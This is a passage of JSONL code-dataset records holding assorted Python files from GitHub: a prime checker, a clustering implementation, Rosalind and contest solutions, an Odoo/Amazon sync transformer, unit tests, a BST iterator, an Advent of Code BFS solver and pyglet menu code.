5)\nplt.show()\n","repo_name":"tushar-nitave/fake-new-classification","sub_path":"code/dm.py","file_name":"dm.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28091167411","text":"#!/usr/bin/python3\ndef is_prime(num):\n \"\"\"Check if a number is prime\n using primilarity test\"\"\"\n import math\n i = 2\n while (i <= math.sqrt(num)):\n if (num % i == 0):\n return False\n i += 1\n return (True)\n#print(is_prime(19))\n#print(is_prime(21))\n","repo_name":"Musoye/RSA-Factoring-Challenge","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"3466783581","text":"from sklearn.metrics import accuracy_score,f1_score,classification_report\r\nfrom sklearn.datasets import load_iris\r\nfrom scipy import spatial\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass AgglomerativeClustering:\r\n \r\n def __init__(self,data,label,threshold=0.99):\r\n self.data = data\r\n self.label = label\r\n self.confidence = threshold\r\n \r\n def cosine_similarity(self,list_1, list_2,epsilon=1e-7):\r\n return np.dot(list_1, list_2) / ((np.linalg.norm(list_1) * np.linalg.norm(list_2))+epsilon)\r\n \r\n def agglomerative_clustering(self):\r\n sample_idx = [] # to store each sample as singleton cluster at the starting\r\n tot_sample = len(self.data)\r\n\r\n for i in range(tot_sample):\r\n sample_idx.append([i])\r\n\r\n i = 0\r\n while i=self.confidence:\r\n group.extend(sample_idx[j])\r\n remove_idx.append(j)\r\n\r\n j+=1\r\n\r\n # club into the cluster\r\n for sample_id in group:\r\n sample_idx[i].append(sample_id)\r\n\r\n # after clubbing we need to update the number of cluster in the data\r\n # so removing those index which has been clubbed in this iteration\r\n for idx,sample_id in enumerate(remove_idx):\r\n sample_idx.pop(sample_id-idx)\r\n\r\n # updaing the length of tot_sample to avoid index error\r\n tot_sample = len(sample_idx)\r\n i+=1\r\n\r\n # if there is no improvement in total number of cluster from previous step\r\n if len(sample_idx)==prev_len:\r\n break\r\n\r\n result = np.zeros(len(self.data))\r\n for i,sample_id in enumerate(sample_idx):\r\n for idx in sample_id:\r\n result[idx]=i\r\n return result\r\n \r\n def get_result(self,cluster):\r\n print(classification_report(binary_label,cluster))\r\n\r\ndata = load_iris()\r\nsample_data = data['data']\r\nbinary_label = data['target']\r\nlabel_name = data['target_names']\r\n\r\nmodel = AgglomerativeClustering(sample_data,binary_label)\r\nresult = model.agglomerative_clustering()\r\nmodel.get_result(result)","repo_name":"Pathakvishnu/Agglomerative-Clustering-From-Scratch","sub_path":"agglomerative_clustering.py","file_name":"agglomerative_clustering.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"36814624728","text":"def lcs(strings):\n strings_number = len(strings)\n len_first_string = len(strings[0])\n\n # Main idea - try all substrings from first string and check whether it is substring for another strings\n\n for i in range(len_first_string, 0, - 1): #length of substring\n for j in range(len_first_string - i + 1): # number of symbols in substring of this length\n candidate = strings[0][j:(j+i)]\n found = [False] * (strings_number - 1) #array showing if substring is found in corresponding string\n for stringNumber in range(1, strings_number):\n found[stringNumber - 1] = strings[stringNumber].find(candidate) > 0\n if not found[stringNumber - 1]:\n break\n if all(f for f in found):\n return candidate\n\nwith open('input.txt', 'r') as input:\n # Read input into a dictionary\n inp = input.read().split()\n dna = dict()\n i = 0\n key = ''\n\n while i < len(inp):\n if inp[i].startswith('>'):\n key = inp[i][1:]\n dna[key] = ''\n i += 1\n else:\n dna[key] += inp[i]\n i += 1\n\n print(lcs(list(dna.values())))","repo_name":"lis-balbes/rosalind","sub_path":"LCSM.py","file_name":"LCSM.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23848835492","text":"N = int(input())\nscores = list(map(int, input().split()))\n\nmax_score = scores[0] # Aslida oxirgi raunddagi g'oliblik ma'lumotini olib tashlaymiz\npossible_winners = 1 # oxirgi g'olibni qo'lga kiritish imkoniyatini 1 bilan boshlaymiz\n\nfor i in range(1, N):\n if scores[i] < max_score: # keyingi o'quvchining balli oxirgi g'olibdan kam bo'lsa\n break # bu o'quvchi g'oliblikka erishish imkoniyati yo'q\n possible_winners += 1 # aks holda, g'oliblikka erishish imkoniyati mavjud\n\nprint(possible_winners)\n","repo_name":"Ziyodulla-Abdukarimov/cp","sub_path":"RoboContest - Robocontest Round 81 Youth Day/Masala #LOXQBETMYX.py","file_name":"Masala #LOXQBETMYX.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24335179425","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom ...model_names.shared_names import RECORD_ID_FIELD\nfrom ...model_names.product_product import (\n AMAZON_SYNC_ACTIVE_FIELD, PRODUCT_LIST_PRICE_FIELD,\n PRODUCT_VIRTUAL_AVAILABLE_FIELD,\n PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD,\n)\nfrom ...model_names.product_sync import (\n SYNC_UPDATE, SYNC_PRICE, SYNC_INVENTORY,\n SYNC_IMAGE, SYNC_DEACTIVATE,\n)\nfrom ...models_access import (\n ProductSyncAccess,\n AmazonProductAccess,\n OdooProductAccess,\n ProductOperationAccess\n)\nfrom .product_create_transformer import ProductCreateTransformer\n\n_logger = logging.getLogger(__name__)\n\n\nclass ProductWriteTransformer(object):\n def __init__(self, env):\n self._env = env\n self._product_sync = ProductSyncAccess(env)\n self._amazon_product = AmazonProductAccess(env)\n self._odoo_product = OdooProductAccess(env)\n\n self._current_amazon_product = None\n\n def _get_creation_status(self, amazon_product):\n waiting_flag = False\n error_flag = False\n if self._amazon_product.is_waiting(amazon_product):\n waiting_flag = True\n elif self._amazon_product.is_error(amazon_product):\n error_flag = True\n\n return waiting_flag, error_flag\n\n def _insert_sync_operation(self, operation, sync_type,\n write_field_names=None):\n\n waiting_flag, error_flag = self._get_creation_status(\n self._current_amazon_product)\n self._product_sync.insert_sync(\n operation, sync_type,\n write_field_names=write_field_names,\n waiting_flag=waiting_flag,\n error_flag=error_flag)\n\n def _add_sync_price(self, operation):\n variants = self._amazon_product.get_variants(\n operation[RECORD_ID_FIELD])\n if variants:\n # because we always create the template with a variant,\n # we are sure a multi-variant template has at least one\n # variant record\n for variant in variants:\n self._insert_sync_operation(variant, SYNC_PRICE)\n else:\n self._insert_sync_operation(operation, SYNC_PRICE)\n\n def _transform_price(self, operation, values):\n # we don't handle the extra price change in attribute line\n # List price is only stored in template, however,\n # it can be changed in template and variant and\n # both generate write operations.\n if PRODUCT_LIST_PRICE_FIELD in values:\n values.remove(PRODUCT_LIST_PRICE_FIELD)\n if ProductOperationAccess.is_product_template(operation):\n self._add_sync_price(operation)\n else:\n _logger.debug('Skip variant {} list_price write.'.format(\n operation[RECORD_ID_FIELD]))\n\n def _transform_inventory(self, operation, values):\n # the inventory is only stored in single-variant template\n # or non-partial variant, no need to skip any inventory update\n if PRODUCT_VIRTUAL_AVAILABLE_FIELD in values:\n values.remove(PRODUCT_VIRTUAL_AVAILABLE_FIELD)\n self._insert_sync_operation(operation, SYNC_INVENTORY)\n\n def _transform_image(self, operation, values):\n # create image sync regardless the image_trigger value\n # only for non-partial variant or single-variant template\n if PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD in values:\n values.remove(PRODUCT_AMAZON_IMAGE_TRIGGER_FIELD)\n if self._odoo_product.is_partial_variant_multi_template(\n operation):\n _logger.debug(\"ignore image operation for a partial variant \"\n \"or multi-variant template.\")\n else:\n self._insert_sync_operation(operation, SYNC_IMAGE)\n\n def _transform_update(self, operation, write_fields):\n self._transform_price(operation, write_fields)\n self._transform_inventory(operation, write_fields)\n self._transform_image(operation, write_fields)\n if write_fields:\n if ProductOperationAccess.is_product_template(operation):\n self._insert_sync_operation(\n operation, SYNC_UPDATE, write_fields)\n else:\n _logger.debug(\"Ignore write operation because it is a \"\n \"product variant.\")\n\n def _transform_deactivate(self, operation):\n if self._odoo_product.is_partial_variant_multi_template(\n operation):\n _logger.debug(\"ignore deactivate operation for a partial variant \"\n \"or multi-variant template.\")\n else:\n self._insert_sync_operation(operation, SYNC_DEACTIVATE)\n\n def _transform_sync_active(self, operation, sync_active_value):\n if sync_active_value:\n _logger.debug(\"Amazon sync active flag changes to True,\"\n \"Call create transformer for create sync.\")\n create_transformer = ProductCreateTransformer(self._env)\n create_transformer.transform(operation)\n else:\n if AmazonProductAccess.is_sync_enabled(\n self._current_amazon_product):\n _logger.debug(\"Amazon sync active flag changes to \"\n \"False, generate a deactivate sync.\")\n self._transform_deactivate(operation)\n else:\n _logger.debug(\"Product is not created in Amazon. \"\n \"Ignore deactivate sync.\")\n\n def transform(self, operation, write_fields):\n \"\"\"\n transform a write operation to one or more sync operations\n 1. If sync active value changes, generate create or deactivate sync.\n 2. If product sync active is False, ignore all changes.\n 3. If price, inventory or image change, generate\n corresponding syncs.\n 4. If there are other write values, generate an update sync.\n\n deactivate, price, inventory and image can happen in both a template\n and its variant(s), need to deal with them case by case.\n Update syncs are only for product template, there is no need\n to update a variant field.\n\n !!! sync initial status could be New (default), Waiting or Error\n a product Amazon creation might be waiting or error.\n When a new product creation is waiting, all changes\n except creation are put into waiting status.\n When the creation status is error, create a sync operation and set\n its status as Error and DONE.\n \"\"\"\n\n self._current_amazon_product = self._amazon_product.search_by_head(\n operation)\n sync_active_value = self._odoo_product.is_sync_active(operation)\n if AMAZON_SYNC_ACTIVE_FIELD in write_fields:\n # sync active is in the write field, use the\n # latest value to create sync operation\n self._transform_sync_active(operation, sync_active_value)\n else:\n if sync_active_value:\n if AmazonProductAccess.is_sync_enabled(\n self._current_amazon_product):\n # we change the local copy in other methods\n values_copy = write_fields.copy()\n self._transform_update(operation, values_copy)\n else:\n _logger.debug(\"Product is not created in Amazon. \"\n \"Ignore write operation.\")\n else:\n _logger.debug(\"Product sync flag is disabled. Ignore writes.\")\n","repo_name":"amdeb/amdeb-amazon","sub_path":"amdeb_amazon/mws/product_operation_transform/product_write_transformer.py","file_name":"product_write_transformer.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"73975548200","text":"import spacy\n\nfrom reviews.features import (\n length,\n unigrams_frequency,\n alliteration,\n letters_to_others\n)\n\nnlp = spacy.load(\"en_core_web_sm\", disable=['ner', 'textcat'])\n\n\ndef test_length():\n doc = nlp('12345')\n assert length(doc) == 5\n\n\ndef test_unigrams_frequency():\n corpus = ('Cat is in the room', 'Room is a big room')\n\n def reviews_reader():\n return ({'text': review} for review in corpus)\n\n frequency = unigrams_frequency(reviews_reader)\n assert 2 in frequency[1] # room\n assert 2 not in frequency[0]\n\n\ndef test_alliteration():\n doc = nlp(\"Infant's don't enjoy infancy, like adults do adultery. \"\n \"The love belongs to those who belove.\")\n assert alliteration(doc) == 5\n\n\ndef test_letters_to_others():\n assert letters_to_others(nlp('12345')) == 0.0\n assert letters_to_others(nlp('A b ')) == 1.0\n\n","repo_name":"dzieciou/funny-reviews","sub_path":"test/reviews/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25966713015","text":"import unittest\n\nimport secu\n\nclass TestSecuMethods(unittest.TestCase):\n\n def test_xor(self):\n \"\"\"\n Test de la function xor\n \"\"\"\n self.assertEqual(secu.xor('0','0'), '0')\n self.assertEqual(secu.xor('0','1'), '1')\n self.assertEqual(secu.xor('1','0'), '1')\n self.assertEqual(secu.xor('1','1'), '0')\n \n def test_encrypt(self):\n \"\"\"\n Test de la function encrypt\n \"\"\"\n self.assertEqual(secu.encrypt('1110011','10'),'0100110')\n\n def test_to_bin(self):\n \"\"\"\n Test de la function to_bin\n \"\"\"\n self.assertEqual(secu.to_bin('0123'),'0000000100100011')\n\n def test_is_valid_ssid(self):\n \"\"\"\n Test de la function is_valid_ssid\n \"\"\"\n self.assertTrue(secu.is_valid_ssid('255081416802538'))\n self.assertFalse(secu.is_valid_ssid('255081468025455'))\n self.assertFalse(secu.is_valid_ssid('25508146802545'))\n\n def test_decode(self):\n \"\"\"\n Test de la fonction decode\n \"\"\"\n encoded = \"101011110101101101111101110111111000001010101101001111111010\"\n indice = '1980106'\n ssid,key = secu.decode(encoded,indice)\n self.assertEqual(ssid, \"198010623476521\")\n self.assertEqual(key,\"10110110110110110110110110111101\")\n\n def test_gen_key(self):\n \"\"\"\n Test de la fonction gen_key\n \"\"\"\n key = secu.gen_key()\n self.assertEqual(len(key),8)\n\n def test_gen_ssid(self):\n \"\"\"\n Test de la fonction gen_ssid\n \"\"\"\n ssid , err = secu.gen_ssid()\n if err != None:\n self.assertTrue(False)\n self.assertTrue(secu.is_valid_ssid(ssid))\n\n def test_process(self):\n \"\"\"\n Test du process sur une centaine de cas tirés au hasard \n \"\"\"\n # iteration sur 100 cas\n for i in range(100):\n # tirage aleatoire d'un ssid\n key = str(secu.gen_key())\n # tirage aleatoire d'une clé\n ssid,err = secu.gen_ssid()\n if err == None :\n # codeage du ssid avec la clé\n encoded = secu.encrypt(secu.to_bin(str(ssid)),secu.to_bin(key))\n # decodage de la chaine encode à apartir d'un indice(7 premier chiffre du ssid)\n ssid2, key2 = secu.decode(str(encoded),str(ssid[0:7]))\n # verification du ssid calculé\n self.assertEqual(ssid,ssid2)\n # verification de la clé calculé\n self.assertEqual(secu.to_bin(key),key2)\n print(\"test \", i, \"ssid:\",ssid, \"key:\", key,\"key en binaire:\", secu.to_bin(key), \"chaine encodée:\",encoded, \"indice:\", str(ssid[0:7]), \"ssid calculé:\", ssid2, \"clé calculée:\", key2 )\n else:\n print(\"erreur dans la generation du ssid \",ssid)\n self.assertTrue(True)\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"jtarte/sample_python_apps","sub_path":"secu_test.py","file_name":"secu_test.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114537641","text":"#\n# https://leetcode.com/problems/binary-search-tree-iterator/\n#\n# Implement the BSTIterator class that represents an iterator \n# over the in-order traversal of a binary search tree (BST):.\n# \n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n \"date\": \"2022/10/7\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"178 ms\",\n \"fasterThan\": \"14%\",\n \"memory\": \"20 MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n'''\n 7\n 3 15\n 9 20\n'''\nclass BSTIterator:\n\n def __init__(self, root: TreeNode):\n self.v_ls = []\n go(root, self.v_ls) \n\n def next(self) -> int:\n return self.v_ls.pop(0)\n\n def hasNext(self) -> bool:\n return self.v_ls != []\n\n def dump(self):\n print(self.v_ls)\n\ndef go(nd, v_ls):\n if nd == None:\n return\n \n go(nd.left, v_ls)\n #print(nd.val)\n v_ls.append(nd.val)\n go(nd.right, v_ls)\n\n#\n# Your BSTIterator object will be instantiated and called as such:\n# obj = BSTIterator(root)\n# param_1 = obj.next()\n# param_2 = obj.hasNext() \n#\n\n\n\n\n\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_15_binary_search_tree/solutions/0173-bst-iter-s2.py","file_name":"0173-bst-iter-s2.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43932666087","text":"\nimport ceilometer\nfrom ceilometer.compute import plugin\nfrom ceilometer.compute.pollsters import util\nfrom ceilometer.compute.virt import inspector as virt_inspector\nfrom ceilometer.openstack.common.gettextutils import _\nfrom ceilometer.openstack.common import log\nfrom ceilometer import sample\n\nLOG = log.getLogger(__name__)\n\n\nclass AllocatedMemoryPollster(plugin.ComputePollster):\n\n def get_samples(self, manager, cache, resources):\n for instance in resources:\n LOG.debug(_('Checking allocated memory for instance %s'), instance.id)\n try:\n memory_info = manager.inspector.inspect_allocated_memory(\n instance)\n LOG.debug(_(\"ALLOCATED MEMORY: %(instance)s %(allocated)f\"),\n ({'instance': instance.__dict__,\n 'allocated': memory_info.allocated}))\n yield util.make_sample_from_instance(\n instance,\n name='memory.allocated',\n type=sample.TYPE_GAUGE,\n unit='MB',\n volume=memory_info.allocated,\n )\n except virt_inspector.InstanceNotFoundException as err:\n # Instance was deleted while getting samples. Ignore it.\n LOG.debug(_('Exception while getting samples %s'), err)\n except ceilometer.NotImplementedError:\n # Selected inspector does not implement this pollster.\n LOG.debug(_('Obtaining Allocated Memory is not implemented for %s'\n ), manager.inspector.__class__.__name__)\n except Exception as err:\n LOG.exception(_('Could not get Allocated Memory for '\n '%(id)s: %(e)s'), {'id': instance.id,\n 'e': err})\n","repo_name":"MisterPup/Ceilometer-Juno-Extension","sub_path":"ceilometer/compute/pollsters/allocated_memory.py","file_name":"allocated_memory.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"42098734473","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .form import RegistrationForm\n\n\n\ndef register (request):\n if request.method =='POST':\n form = RegistrationForm(request.POST)\n if form.is_valid(): \n form.save()\n messages.success(request, f'Account Created Successfully')\n return redirect(\"estateapp-home\")\n else:\n form = RegistrationForm()\n return render(request, 'register/form.html', {'form': form})\n","repo_name":"nseudondian/estateapp","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6553313709","text":"# bottom-up\nn = int(input())\ndp = [0 for x in range(n+1)]\n\nfor i in range(2, n+1):\n dp[i] = dp[i - 1] + 1\n if i % 2 == 0:\n dp[i] = min(dp[i], dp[i // 2] + 1)\n if i % 3 == 0:\n dp[i] = min(dp[i], dp[i // 3] + 1)\n\nprint(dp[n])\n\n\n# top-down(but, runtime error)\n\nimport sys\nsys.setrecursionlimit(100000000)\n\nn = int(input())\ndp = [None for x in range(n+1)]\ndp[0] = 0\ndp[1] = 0\n\n\ndef calc_dp(i):\n if dp[i] is None:\n dp[i] = calc_dp(i - 1) + 1\n if i % 2 == 0:\n dp[i] = min(dp[i], calc_dp(i // 2) + 1)\n if i % 3 == 0:\n dp[i] = min(dp[i], calc_dp(i // 3) + 1)\n\n return dp[i]\n\n\nprint(calc_dp(n))\n\n\n\n\n\n\n# dp = [0,0] # 시작 위치는 0,0으로 설정, 동전 문제 푸는 것과 유사하게 접근함\n#\n# n = int(input())\n#\n# for i in range(2,n+1): # 2부터 n 까지 수열 정리\n# temp = []\n# temp.append(dp[i-1]+1) # 1차이는 무조건 되니까 넣고\n# if i % 2 == 0:\n# temp.append(dp[i//2]+1) # 2로 나누어 떨어지는지는 확인\n# if i % 3 == 0:\n# temp.append(dp[i//3]+1) # 3으로 나누어 떨어지는지도 확인\n# dp.append(min(temp)) # 그 중 최소값\n# print(dp[n]) # n번째 출력\n\n'''\n참고한 코드\n\na = int(input())\ncount = 0\nminimum=[a]\ndef cal(a):\n list = []\n for i in a:\n list.append(i-1)\n if i%3 == 0:\n list.append(i/3)\n if i%2 == 0:\n list.append(i/2)\n return list\n \nwhile True:\n if a == 1:\n print(count)\n break\n \n temp = minimum[:]\n minimum = []\n minimum = cal(temp)\n count +=1\n if min(minimum) == 1:\n print(count)\n break\n'''","repo_name":"timetobye/BOJ_Solution","sub_path":"problem_solve_result/1463.py","file_name":"1463.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"36367947538","text":"\"\"\"\nSearch Puzzle\n\"\"\"\n\nimport time\n\nimport numpy as np\nfrom aocd.models import Puzzle\nfrom matplotlib import pyplot as plt\n\nDAY = 12\nYEAR = 2022\n\nPosition = tuple[int, int]\n\n\ndef main():\n puzzle = Puzzle(year=YEAR, day=DAY)\n puzzle.answer_a = solve_a(puzzle.input_data)\n puzzle.answer_b = solve_b(puzzle.input_data)\n\n\ndef parse_input(\n puzzle_input: str, verbose: bool = False\n) -> tuple[Position, Position, np.ndarray]:\n \"\"\"\n Example:\n Sabqponm\n abcryxxl\n accszExk\n acctuvwj\n abdefghi\n\n Convert letters to numbers, with a=0, b=1, c=2, etc.\n 'S' marks the start, 'E' marks the goal.\n The starting position 'S' has elevation 'a', and the goal 'E' has elevation 'z'.\n Return numpy int array of height map and indices of start and goal.\n \"\"\"\n # first parse input as string array\n height_map = np.array([list(line.strip()) for line in puzzle_input.splitlines()])\n # find start and goal\n start = np.argwhere(height_map == \"S\")[0]\n goal = np.argwhere(height_map == \"E\")[0]\n # replace start and goal with 'a' and 'z'\n height_map[start[0], start[1]] = \"a\"\n height_map[goal[0], goal[1]] = \"z\"\n # convert letters to numbers\n height_map = np.vectorize(lambda x: ord(x) - ord(\"a\"))(height_map)\n if verbose:\n print(\"Start:\", start)\n print(\"Goal:\", goal)\n print(\"Size:\", height_map.shape)\n print(\"Height map:\")\n print(height_map)\n # convert start and goal to tuples\n start = tuple(start.tolist())\n goal = tuple(goal.tolist())\n return start, goal, height_map\n\n\ndef get_neighbors(current: Position, height_map: np.ndarray) -> list[Position]:\n \"\"\"\n During each step, you can move exactly one square up, down, left, or right.\n You cannot move diagonally.\n You can only move to a square with a height that is at most 1 higher than your current height.\n \"\"\"\n neighbors = []\n # get all possible neighbors\n # this includes neighbors outside of the height map\n # these neighbors are filtered out later\n for i in range(-1, 2):\n for j in range(-1, 2):\n # skip if current position\n if i == 0 and j == 0:\n continue\n # skip if diagonal\n if abs(i) == abs(j):\n continue\n # add neighbor to list\n neighbors.append(current + np.array([i, j]))\n # turn list of numpy arrays into list of tuples\n neighbors = [tuple(neighbor.tolist()) for neighbor in neighbors]\n # filter out neighbors with invalid indices\n neighbors = [\n neighbor\n for neighbor in neighbors\n if 0 <= neighbor[0] < height_map.shape[0] # check row index\n and 0 <= neighbor[1] < height_map.shape[1] # check column index\n ]\n # filter out neighbors with invalid height\n neighbors = [\n neighbor\n for neighbor in neighbors\n if height_map[neighbor] - height_map[current] <= 1\n ]\n return neighbors\n\n\ndef plot_path(\n name, height_map: np.ndarray, path: list, start: Position, goal: Position\n):\n # provide some plot maze and path\n plt.imshow(height_map, cmap=\"gray\")\n # plot start and goal as red and green dots\n plt.plot(start[1], start[0], \"ro\")\n plt.plot(goal[1], goal[0], \"go\")\n # plot path as blue line\n plt.plot([p[1] for p in path], [p[0] for p in path], \"b-\")\n # save plot as {name}.png\n plt.savefig(f\"{name}.png\")\n # close plot\n plt.close()\n\n\ndef path_throguh_map(\n start: Position,\n goal: Position,\n height_map: np.ndarray,\n visualize: bool = False,\n) -> tuple[int, list]:\n \"\"\"\n Return the shortest path from start to goal through the height map.\n Use BFS to find the shortest path.\n \"\"\"\n # initialize queue\n queue = [(start, 0, [start])]\n # keep track of visited nodes\n visited = set()\n # give some progress information\n print(\"Start search...\")\n while queue:\n # pop first element from queue\n # current: current position\n # distance: distance from start to current\n # path: list of positions from start to current\n # pop(0) is used instead of pop() to implement breadth-first search\n current, distance, path = queue.pop(0)\n # give some progress information about current distance\n # and overwrite previous line\n print(f\"Distance: {distance}\", end=\"\\r\")\n\n # check if goal is reached\n # if so, return distance and path\n # otherwise, add neighbors to queue\n if current == goal:\n if visualize:\n plot_path(\"success\", height_map, path, start, goal)\n return distance, path\n\n # add neighbors to queue\n # neighbors are added to queue in order of increasing distance from start\n # this is done by appending to the end of the queue\n for neighbor in get_neighbors(current, height_map):\n # skip if already visited\n if neighbor in visited:\n continue\n\n # mark as visited\n visited.add(neighbor)\n\n # add to queue\n # distance is increased by 1\n # path is extended by neighbor\n queue.append((neighbor, distance + 1, path + [neighbor]))\n\n # plot_path(\"debug\", height_map, path, start, goal)\n # if no path is found, raise ValueError\n # provide distance and neighbors of last visited node\n # check if neighbors have been visited\n debug_message = f\"No path found from {start} to {goal} through height map:\\n\"\n debug_message += f\"Largest distance: {distance}\\n\"\n debug_message += (\n f\"Neighbors of last visited node: {get_neighbors(current, height_map)}\\n\"\n )\n debug_message += f\"Have neighbors been visited?\\n\"\n for neighbor in get_neighbors(current, height_map):\n debug_message += f\"{neighbor}: {neighbor in visited}\\n\"\n debug_message += f\"See debug.png for plot of height map and path.\"\n raise ValueError(debug_message)\n\n\nexample_input = \"\"\"\\\nSabqponm\nabcryxxl\naccszExk\nacctuvwj\nabdefghi\\\n\"\"\"\n\n\ndef solve_a(puzzle_input):\n start, goal, height_map = parse_input(puzzle_input, verbose=True)\n distance, path = path_throguh_map(start, goal, height_map, visualize=True)\n print(\"Shortest path:\")\n print(path)\n print(\"Distance:\", distance)\n return distance\n\n\ndef solve_b(puzzle_input):\n \"\"\"\n Do reverse search from goal to new starting point.\n Candidates for new starting point are all positions with height 0.\n Return the minimum distance.\n \"\"\"\n start, goal, height_map = parse_input(puzzle_input)\n # find all positions with height 0\n # these are the candidates for new starting points\n candidates = np.argwhere(height_map == 0)\n # convert candidates to list of tuples\n candidates = [tuple(candidate.tolist()) for candidate in candidates]\n # save winning candidate\n winning_candidate = None\n # keep track of minimum distance\n min_distance = np.inf\n # keep track of path with minimum distance\n min_distance_path = None\n # give some progress information\n # time how long it takes to find the shortest path\n start_time = time.time()\n print(\"Start search...\")\n for i, candidate in enumerate(candidates):\n # give some progress information\n # overwrite previous line\n print(\n f\"Progress: {i + 1}/{len(candidates)} ({(i + 1) / len(candidates) * 100:.2f}%)\"\n )\n # find path from candidate to goal\n # keep going if path is not found\n try:\n distance, path = path_throguh_map(candidate, goal, height_map)\n except ValueError:\n continue\n # check if distance is smaller than minimum distance\n if distance < min_distance:\n # update minimum distance\n min_distance = distance\n # update path with minimum distance\n min_distance_path = path\n # update winning candidate\n winning_candidate = candidate\n # give some progress information and how long it took\n print(f\"Done in {time.time() - start_time:.2f} seconds.\")\n # plot path\n plot_path(\"success\", height_map, min_distance_path, winning_candidate, goal)\n # return maximum distance\n return min_distance\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MDornacher/AdventOfCodeSolutions","sub_path":"aocs/aoc_2022/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"33509195772","text":"import pyglet, resources, create_window\nfrom pyglet.sprite import Sprite\nfrom pyglet.text import Label\nfrom create_window import scale_menu\n\nwhereami = 0\noption = 0\nlabel = None\n\ndef active_screen(width, height, batch=None, back=None, front=None):\n\t# Handles which screen is to be loaded depending on the value of whereami\n\tif whereami == 0:\n\t\tactive_screen = main_menu(width, height, batch, back, front)\n\telif whereami == 1:\n\t\tactive_screen = options_menu(width, height, batch, back, front)\n\telif whereami == 2:\n\t\tactive_screen= pause_menu(width, height, batch, back, front)\n\treturn active_screen\n\ndef main_menu(width, height, batch=None, back=None, front=None):\n\t# Loads button sprites used in main menu\n\tstart_button = Sprite(img=resources.start_button, x=width/2, y=height*3/4, batch=batch, group=front)\n\toption_button = Sprite(img=resources.options_button, x=width/2, y=height*2/4, batch=batch, group=front)\n\texit_button = Sprite(img=resources.exit_button, x=width/2, y=height*1/4, batch=batch, group=front)\n\tmenu = [start_button, option_button, exit_button]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef options_menu(width, height, batch=None, back=None, front=None):\n\t# Loads buttons sprites and the label showing resolution in options menu\n\tglobal label\n\tapply_button = Sprite(img=resources.apply_button, x=width*2/5, y=height*1/10, batch=batch, group=front)\n\tback_button = Sprite(img=resources.back_button, x=width*3/5, y=height*1/10, batch=batch, group=front)\n\tleft_res = Sprite(img=resources.left_button, x=width*1/5, y=height/2, batch=batch, group=front)\n\tright_res = Sprite(img=resources.right_button, x=width*4/5, y=height/2, batch=batch, group=front)\n\tlabel = Label(font_name='Comic Sans', \n\t\t font_size=18, x=width/2, y=height/2, anchor_x='center', anchor_y='center', batch=batch)\n\t# Loads the text of the label\n\treslabel(0)\n\tmenu = [apply_button, back_button, left_res, right_res]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef pause_menu(width, height, batch=None, back=None, front=None):\n\t#loads pause menu, background and button sprites\n\tbackground = Sprite(img=resources.pause_menu, x=width/2, y=height/2, batch=batch, group=back)\n\tresume_button = Sprite(img=resources.resume_button, x=width/2, y=height*6/10, batch=batch, group=front)\n\trestart_button = Sprite(img=resources.restart_button, x=width/2, y=height*5/10, batch=batch, group=front)\n\tmenu_button = Sprite(img=resources.menu_button, x=width/2, y=height*4/10, batch=batch, group=front)\n\tmenu = [resume_button, restart_button, menu_button, background]\n\tscale_menu(menu, width)\n\treturn menu\n\ndef reslabel(num):\n\t# changes the resolution label text according to options given,\n\t# by left right arrow in options menu\n\tglobal option, label\n\tif num == 1 and option != 2:\n\t\toption += 1\n\telif num == -1 and option != 0:\n\t\toption -=1\n\telse:\n\t\tif option == 2:\n\t\t\toption = 0\n\t\telse:\n\t\t\toption = 2\n\tif option == 0:\n\t\tlabel.text = \"800x600\"\n\telif option == 1:\n\t\tlabel.text = \"1024x768\"\n\telif option == 2:\n\t\tlabel.text = 